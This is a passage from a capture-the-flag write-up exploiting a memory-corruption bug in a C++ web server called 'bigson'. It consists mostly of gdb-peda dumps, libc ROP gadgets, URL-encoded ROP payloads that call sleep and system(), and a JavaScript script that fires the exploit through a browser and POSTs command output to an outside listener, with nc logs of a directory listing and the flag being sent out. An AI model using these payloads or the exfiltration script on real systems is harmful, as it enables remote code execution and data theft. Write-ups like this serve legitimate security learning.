0x7fffffffcfc8 --> 0x7fffffffd350 --> 0x1 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00000000004034ce in HashTable::Hash(std::string const&) const () gdb-peda$ context stack 100 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffcf90 --> 0x7fffffffd250 --> 0x60fc38 --> 0x61616100656c6966 ('file') 0008| 0x7fffffffcf98 --> 0x7fffffffd350 --> 0x1 0016| 0x7fffffffcfa0 --> 0x0 0024| 0x7fffffffcfa8 --> 0x401ff0 (<_start>: xor ebp,ebp) 0032| 0x7fffffffcfb0 --> 0x7fffffffcfe0 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0040| 0x7fffffffcfb8 --> 0x40336e (<_ZNK9HashTable6LookupERKSs+54>: mov QWORD PTR [rbp-0x10],rax) 0048| 0x7fffffffcfc0 --> 0x7fffffffd250 --> 0x60fc38 --> 0x61616100656c6966 ('file') 0056| 0x7fffffffcfc8 --> 0x7fffffffd350 --> 0x1 0064| 0x7fffffffcfd0 --> 0x0 0072| 0x7fffffffcfd8 --> 0x7fffffffd2f0 --> 0x60e730 --> 0x646e692f00544547 ('GET') 0080| 0x7fffffffcfe0 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0088| 0x7fffffffcfe8 --> 0x4028e7 (<_Z12IndexHandlerRKSsRK11HttpRequestP12HttpResponse+268>: mov QWORD PTR [rbp-0x18],rax) 0096| 0x7fffffffcff0 --> 0x24ab43c8 0104| 0x7fffffffcff8 --> 0x7fffffffd2a0 --> 0xc8 0112| 0x7fffffffd000 --> 0x7fffffffd2f0 --> 0x60e730 --> 0x646e692f00544547 ('GET') 0120| 0x7fffffffd008 --> 0x7fffffffd308 --> 0x60faa8 --> 0x7865646e692f ('/index') 0128| 0x7fffffffd010 --> 0xffffffff 0136| 0x7fffffffd018 --> 0x7ffff7ffa678 --> 0x7ffff7ad3000 --> 0x10102464c457f 0144| 0x7fffffffd020 --> 0x7ffff7ae05f0 --> 0xc002200024046 0152| 0x7fffffffd028 --> 0x7ffff7ffa678 --> 0x7ffff7ad3000 --> 0x10102464c457f 0160| 0x7fffffffd030 --> 0xffffffff 0168| 0x7fffffffd038 --> 0x7ffff7fb6030 --> 0x7ffff7b1b1a8 ("GLIBCXX_3.4") 0176| 0x7fffffffd040 --> 0x250 0184| 0x7fffffffd048 --> 0x1 0192| 0x7fffffffd050 --> 0x0 0200| 0x7fffffffd058 --> 0x7ffff7ffa9d0 --> 0x7ffff7ffe440 --> 0x7ffff7fb7af0 --> 0x7ffff7ffe188 --> 0x0 0208| 0x7fffffffd060 --> 0x661b4bde 0216| 0x7fffffffd068 --> 0x7ffff7ffe4e0 --> 0x7ffff7ffe440 --> 0x7ffff7fb7af0 --> 0x7ffff7ffe188 --> 0x0 0224| 0x7fffffffd070 --> 0x687d56c0 0232| 0x7fffffffd078 --> 0x7fffffffdb60 --> 0x60fc00 --> 0x60fe28 ("AAAaAA0AABAAbAA1AACAAcAAABCD") 0240| 0x7fffffffd080 --> 0x7fffffffd0a0 --> 0x0 0248| 0x7fffffffd088 --> 0x60b280 --> 0x7ffff7b907d0 (<_ZNKSs5c_strEv>: mov rax,QWORD PTR [rdi]) 0256| 0x7fffffffd090 --> 0x0 0264| 0x7fffffffd098 --> 0x7fffffffdd00 --> 0x1 0272| 0x7fffffffd0a0 --> 0x0 0280| 0x7fffffffd0a8 --> 0x0 0288| 0x7fffffffd0b0 --> 0x7fffffffd170 --> 0x7fffffffd1c0 --> 0x7fffffffd1e0 --> 0x7fffffffd210 --> 0x7fffffffd260 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0296| 0x7fffffffd0b8 --> 0x7ffff7de8f35 (<_dl_fixup+245>: mov rbp,rax) 0304| 0x7fffffffd0c0 --> 0x7fff00000001 0312| 0x7fffffffd0c8 --> 0x0 0320| 0x7fffffffd0d0 --> 0x0 0328| 0x7fffffffd0d8 --> 0x7ffff7ae05f0 --> 0xc002200024046 0336| 0x7fffffffd0e0 --> 0x60f740 --> 0x407c50 --> 0x403126 (<_ZN7PHPHashD2Ev>: push rbp) 0344| 0x7fffffffd0e8 --> 0x7fffffffd170 --> 0x7fffffffd1c0 --> 0x7fffffffd1e0 --> 0x7fffffffd210 --> 0x7fffffffd260 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0352| 0x7fffffffd0f0 --> 0x40319a (<_ZN7PHPHashclEPKc>: push rbp) 0360| 0x7fffffffd0f8 --> 0x7ffff7def445 (<_dl_runtime_resolve+53>: mov r11,rax) 0368| 0x7fffffffd100 --> 0x7fffffffd1f0 --> 0x0 0376| 0x7fffffffd108 --> 0x7ffff75b85c0 --> 0x0 0384| 0x7fffffffd110 --> 0x7fffffffd1f0 --> 0x0 0392| 0x7fffffffd118 --> 0x0 0400| 0x7fffffffd120 --> 0x6101c9 --> 0x0 0408| 0x7fffffffd128 --> 0x60f740 --> 0x407c50 --> 0x403126 (<_ZN7PHPHashD2Ev>: push rbp) 0416| 0x7fffffffd130 --> 0x0 0424| 0x7fffffffd138 --> 0x101 0432| 0x7fffffffd140 --> 0x7fffffffd170 --> 0x7fffffffd1c0 --> 0x7fffffffd1e0 --> 0x7fffffffd210 --> 0x7fffffffd260 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0440| 0x7fffffffd148 --> 0x4034d1 (<_ZNK9HashTable4HashERKSs+123>: add rsp,0x10) 0448| 0x7fffffffd150 --> 0x7fffffffd1f0 --> 0x0 0456| 0x7fffffffd158 --> 0x7fffffffd350 --> 0x1 0464| 0x7fffffffd160 --> 0x60fc00 --> 0x60fe28 ("AAAaAA0AABAAbAA1AACAAcAAABCD") .......
Unfortunately, it seems that an “add rsp, … ; ret” gadget isn't going to cut it. After some failed attempts to exploit it in this way I had another idea: let's add another parameter to the request:
$ curl "127.0.0.1:81/index?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=AAAaAA0AABAAbAA1AACAAcAAABCD&TESTINGPARAM=TESTINGVALUE" gdb-peda$ contin Continuing. [----------------------------------registers-----------------------------------] RAX: 0x60fd78 ("TESTINGPARAM") RBX: 0x60fc30 --> 0x60fe58 ("AAAaAA0AABAAbAA1AACAAcAAABCD") RCX: 0x7fffffffd350 --> 0x1 RDX: 0x7fffffffd1f0 --> 0x60fd78 ("TESTINGPARAM") RSI: 0x60fd78 ("TESTINGPARAM") RDI: 0x60fc30 --> 0x60fe58 ("AAAaAA0AABAAbAA1AACAAcAAABCD") RBP: 0x7fffffffd140 --> 0x7fffffffd170 --> 0x7fffffffd1c0 --> 0x7fffffffd240 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 RSP: 0x7fffffffd120 --> 0x7fffffffd1f0 --> 0x60fd78 ("TESTINGPARAM") RIP: 0x4034ce (<_ZNK9HashTable4HashERKSs+120>: call r12) R8 : 0x0 R9 : 0x0 R10: 0x7ffff75b8618 --> 0x610300 --> 0x0 R11: 0x7ffff7386cf0 --> 0xfffc4e30fffc4670 R12: 0x6161610044434241 ('ABCD') R13: 0x7fffffffdd00 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4034c3 <_ZNK9HashTable4HashERKSs+109>: call 0x401bb0 <_ZNKSs5c_strEv@plt> 0x4034c8 <_ZNK9HashTable4HashERKSs+114>: mov rsi,rax 0x4034cb <_ZNK9HashTable4HashERKSs+117>: mov rdi,rbx => 0x4034ce <_ZNK9HashTable4HashERKSs+120>: call r12 0x4034d1 <_ZNK9HashTable4HashERKSs+123>: add rsp,0x10 0x4034d5 <_ZNK9HashTable4HashERKSs+127>: pop rbx 0x4034d6 <_ZNK9HashTable4HashERKSs+128>: pop r12 0x4034d8 <_ZNK9HashTable4HashERKSs+130>: pop rbp Guessed arguments: arg[0]: 0x60fc30 --> 0x60fe58 ("AAAaAA0AABAAbAA1AACAAcAAABCD") arg[1]: 0x60fd78 ("TESTINGPARAM") [------------------------------------stack-------------------------------------] 0000| 0x7fffffffd120 --> 0x7fffffffd1f0 --> 0x60fd78 ("TESTINGPARAM") 0008| 0x7fffffffd128 --> 0x7fffffffd350 --> 0x1 0016| 0x7fffffffd130 --> 0x0 0024| 0x7fffffffd138 --> 0x401ff0 (<_start>: xor ebp,ebp) 0032| 0x7fffffffd140 --> 0x7fffffffd170 --> 0x7fffffffd1c0 --> 0x7fffffffd240 --> 0x7fffffffd280 --> 0x7fffffffdbb0 --> 0x7fffffffdbd0 --> 0x7fffffffdc20 --> 0x0 0040| 0x7fffffffd148 --> 0x40336e (<_ZNK9HashTable6LookupERKSs+54>: mov QWORD PTR [rbp-0x10],rax) 0048| 0x7fffffffd150 --> 0x7fffffffd1f0 --> 0x60fd78 ("TESTINGPARAM") 0056| 0x7fffffffd158 --> 0x7fffffffd350 --> 0x1 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x00000000004034ce in HashTable::Hash(std::string const&) const () gdb-peda$
This is much much better. We can use an “xchg esp, eax” gadget from libc to pivot the stack (as the heap address fits inside 4 bytes: 0x60fd78) and add any ROP chain we want.
[-------------------------------------code-------------------------------------] => 0x7ffff731e585 <innetgr+725>: ret 0x7ffff731e586 <innetgr+726>: lea rsi,[r12+0x48] 0x7ffff731e58b <innetgr+731>: lea rdi,[r12+0x40] 0x7ffff731e590 <innetgr+736>: call 0x7ffff731de40 <free_memory.isra.1> [------------------------------------stack-------------------------------------] 0000| 0x60fd78 ("TESTINGPARAM") 0008| 0x60fd80 --> 0x314141004d415241 ('ARAM') 0016| 0x60fd88 ("AACAAcAAABCD") 0024| 0x60fd90 --> 0x44434241 ('ABCD') 0032| 0x60fd98 --> 0x31 ('1') 0040| 0x60fda0 --> 0x60fc40 --> 0x60f740 --> 0x407c50 --> 0x403126 (<_ZN7PHPHashD2Ev>: push rbp) 0048| 0x60fda8 --> 0x4 0056| 0x60fdb0 --> 0xffffffff [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x00007ffff731e585 in innetgr () from /lib64/libc.so.6 gdb-peda$ hexdump $rsp /5 0x0060fd78 : 54 45 53 54 49 4e 47 50 41 52 41 4d 00 41 41 31 TESTINGPARAM.AA1 0x0060fd88 : 41 41 43 41 41 63 41 41 41 42 43 44 00 00 00 00 AACAAcAAABCD.... 0x0060fd98 : 31 00 00 00 00 00 00 00 40 fc 60 00 00 00 00 00 1.......@.`..... 0x0060fda8 : 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 ................ 0x0060fdb8 : 54 45 53 54 00 4e 47 50 41 52 41 4d 00 00 00 00 TEST.NGPARAM....
Local exploitation
The gadgets I found useful from libc were:
0x2adb7 <newlocale+951>: xchg esp,eax 0x2adb8 <newlocale+952>: ret 0x1055a0 <xdr_free+16>: mov rdi,rsp 0x1055a3 <xdr_free+19>: call rdx 0x1b8a: pop rdx 0x1b8b: ret 0x2024b: pop rdi 0x2024c: ret
To test locally I like to use the sleep function for 0x10 seconds. We leverage the fact that urldecode is applied on the parameter names and values when sending payload bytes.
cmd += quote_string( struct.pack("<Q", poprdi) ) cmd += quote_string( struct.pack("<Q", 0x10 ) ) cmd += quote_string( struct.pack("<Q", sleep) )
$ time python /tmp/writeup/testsleep.py 7ffff7214000 curl "127.0.0.1:81/index?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00&%D8%9E%23%F7%FF%7F%00%00%10%00%00%00%00%00%00%00%00%0C%2D%F7%FF%7F%00%00=TESTINGVALUE" curl: (52) Empty reply from server real 0m16.004s user 0m0.001s sys 0m0.001s
By modifying the exploit script to call system() we should get the result back on to the socket:
cmd += quote_string( struct.pack("<Q", poprdx) ) cmd += quote_string( struct.pack("<Q", system) ) cmd += quote_string( struct.pack("<Q", movcall) ) cmd += quote_string("""echo -en "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 100\r\n\r\n `date` " >&10 ; exit;""")
$ python /tmp/writeup.py 7ffff7214000 curl "127.0.0.1:81/index?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00%B5%59%27%F7%FF%7F%00%00&%2E%8E%21%F7%FF%7F%00%00%80%8F%25%F7%FF%7F%00%00%60%F3%32%F7%FF%7F%00%00%65%63%68%6F%20%2D%65%6E%20%22%48%54%54%50%2F%31%2E%31%20%32%30%30%20%4F%4B%0D%0A%43%6F%6E%74%65%6E%74%2D%54%79%70%65%3A%20%74%65%78%74%2F%68%74%6D%6C%0D%0A%43%6F%6E%74%65%6E%74%2D%4C%65%6E%67%74%68%3A%20%31%30%30%0D%0A%0D%0A%20%60%64%61%74%65%60%20%22%20%3E%26%31%30%20%3B%20%65%78%69%74%3B=TESTINGVALUE" curl: (18) transfer closed with 69 bytes remaining to read Mon Apr 21 14:02:09 EEST 2014
Remote exploitation
First I tested the exploit using sleep as before and everything worked ok. However, trying to write on the socket always produced an error in the XMLHttpRequest that I haven't gotten round to fixing.
Fortunately, I came up with another idea to get the data out from there: since we can run any commands why not write into /tmp/ the output of commands and then grab the contents using the “normal” behaviour of the bigson server?
We tweak the javascript payload into the following:
- part2.js
function do_requests(file_path, payload) { var response = ''; var geturl = ""; if (file_path != '') { geturl = "http://bigson.essolutions.largestctf.com/index?file=" + file_path; }; if (payload != '') { var base = "http://bigson.essolutions.largestctf.com/index?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa="; geturl = base + payload; }; $.ajax({ type: "GET", url: geturl, async: false, beforeSend : function (xhr) { xhr.overrideMimeType( "application/octet-stream; charset=x-user-defined" ); }, success : function(data, textStatus, jqXHR) { response += jqXHR.responseText; }, error: function(jqXHR, textStatus, ex) { response += "GET request error response:\n" + textStatus + "\n" + ex + "\n" + jqXHR.responseText + jqXHR.getAllResponseHeaders() + jqXHR.statusCode(); } }); if (file_path != '') { $.ajax({ type: "POST", url: "http://swarm.cs.pub.ro:42424", async: false, data: "POST request made. Response was:\n" + response, success : function(text) { } }); }; } function requests() { do_requests("", "%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00%B7%4D%61%7A%8B%7F%00%00&%8A%BB%5E%7A%8B%7F%00%00%80%9F%62%7A%8B%7F%00%00%A0%F5%6E%7A%8B%7F%00%00%20%6C%73%20%2D%61%6C%20%2F%68%6F%6D%65%2F%62%69%67%73%6F%6E%20%3E%20%2F%74%6D%70%2F%73%75%70%65%72%5F%73%65%63%72%65%74%5F%6E%61%6D%65%7A%3B%20%65%78%69%74%3B=TESTINGVALUE"); do_requests("/tmp/super_secret_namez",""); } var script = document.createElement("SCRIPT"); script.src = 'http://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js'; script.type = 'text/javascript'; document.getElementsByTagName("head")[0].appendChild(script); script.onload = requests;
And set the payload to:
cmd += quote_string( struct.pack("<Q", poprdx) ) cmd += quote_string( struct.pack("<Q", system) ) cmd += quote_string( struct.pack("<Q", movcall) ) cmd += quote_string(""" ls -al /home/bigson > /tmp/super_secret_namez; exit;""")
This is the result:
rcaragea@swarm:~$ nc -lvp 42424 listening on [any] 42424 ... connect to [141.85.227.118] from ec2-54-86-24-189.compute-1.amazonaws.com [54.86.24.189] 37136 POST / HTTP/1.1 Origin: http://portal.essolutions.largestctf.com User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.7 Safari/534.34 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: http://portal.essolutions.largestctf.com/login.php Content-Length: 338 Connection: Keep-Alive Accept-Encoding: gzip Accept-Language: en-US,* Host: swarm.cs.pub.ro:42424 POST request made. Response was: total 108 drwxr-xr-x 2 root root 4096 Apr 13 16:39 . drwxr-xr-x 4 root root 4096 Apr 12 22:44 .. -rwxr-xr-x 1 root root 94113 Apr 13 02:16 bigson -rw-r--r-- 1 root root 231 Apr 13 16:22 index.html -r--r----- 1 root bigson 30 Apr 12 22:49 really_weirdly_named_key_haha
And cat on the file to receive:
rcaragea@swarm:~$ nc -lvp 42424 listening on [any] 42424 ... connect to [141.85.227.118] from ec2-54-86-24-189.compute-1.amazonaws.com [54.86.24.189] 37160 POST / HTTP/1.1 Origin: http://portal.essolutions.largestctf.com User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.7 Safari/534.34 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: http://portal.essolutions.largestctf.com/login.php Content-Length: 63 Connection: Keep-Alive Accept-Encoding: gzip Accept-Language: en-US,* Host: swarm.cs.pub.ro:42424 POST request made. Response was: WEB_you_hacked_the_bigson_WEB